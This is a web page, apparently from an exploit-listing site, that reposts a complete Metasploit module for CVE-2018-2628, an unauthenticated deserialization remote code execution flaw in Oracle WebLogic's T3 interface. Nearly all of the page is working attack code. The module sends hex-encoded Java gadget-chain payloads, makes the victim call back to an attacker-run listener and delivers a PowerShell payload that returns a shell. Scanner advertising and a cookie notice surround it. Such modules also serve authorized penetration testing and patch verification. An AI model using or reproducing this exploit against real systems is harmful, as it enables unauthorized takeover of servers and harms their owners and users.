oracle weblogic server deserialization remote code execution (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & windows vulnerability




Online Vulnerability Scanner Tools
oracle weblogic server deserialization remote code execution (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Oracle Weblogic Server Deserialization RCE',
      'Description' => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic
        Server T3 interface can send a serialized object to the interface to
        execute code on vulnerable hosts.
      },
      'Author' =>
        [
        'brianwrf',     # EDB PoC
        'Jacob Robles'  # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2018-2628'],
          ['EDB', '44553']
        ],
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Windows',
            {
              'Platform' => ['win']
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DefaultOptions' =>
        {
          'RPORT' => 7001
        },
      'DisclosureDate' => 'Apr 17 2018'))
  end

  def gen_resp
    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join

    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
    mycmd << tmp_dat

    # Response data taken from JRMPListener generated data:
    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
    # Modified captured network traffic bytes. Patch in command to run
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
    @resp << '673badd256e7e91d7b470200007078700000000174'

    @resp << mycmd

    @resp << '74'
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
    @resp << '7e005a'
  end


  def on_client_connect(client)
    # Make sure to only sent one meterpreter payload to a host.
    # During testing the remote host called back up to 11 times
    # (or as long as the server was listening).
    vprint_status("Comparing host: #{client.peerhost}")
    if @met_sent.include?(client.peerhost) then return end
    @met_sent << client.peerhost

    vprint_status("met_sent: #{@met_sent}")

    # Response format determined by watching network traffic
    # generated by EDB PoC
    accept_conn = '4e00'
    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
    accept_conn << raccept_conn
    accept_conn << '0000'
    accept_conn << client.peerport.to_s(16).rjust(4,'0')

    client.put([accept_conn].pack('H*'))
    client.put([@resp].pack('H*'))
  end

  def t3_handshake
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'

    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def build_t3_request_object
    # data block is from EDB PoC
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
    data << '2d4147444d565155423154362e656883348cd6000000070000'

    data << rport.to_s(16).rjust(4, '0')

    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
    data << '863d1d0000000078'

    sock.put([data].pack('H*'))
    sleep(2)
    sock.get_once
  end

  def send_payload_objdata
    # JRMPClient2 payload generated from EDB PoC:
    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
    # Patch in srvhost and srvport
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
    payload << '78707702000078fe010000'

    # Data
    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
    payload << '1e030000787077'

    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
    unicast_dat = '000a556e696361737452656600'
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
    unicast_dat << unicast_srvhost
    unicast_dat << '0000'
    unicast_dat << srvport.to_s(16).rjust(4,'0')
    unicast_dat << '000000004e18654b000000000000000000000000000000'
    unicast_dat << '78'

    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
    payload << unicast_dat

    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
    payload << '6f3b290000001b7878fe00ff'

    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << payload

    sock.put([data].pack('H*'))
    sleep(1)
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def exploit
    @met_sent = []
    gen_resp

    connect
    vprint_status('Sending handshake...')
    t3_handshake

    build_t3_request_object

    start_service

    vprint_status('Sending payload...')
    send_payload_objdata

    # Need to wait this long to make sure we get a shell back
    sleep(10)
  end
end

Oracle weblogic server deserialization remote code execution (metasploit) Vulnerability / Exploit Source : Oracle weblogic server deserialization remote code execution (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.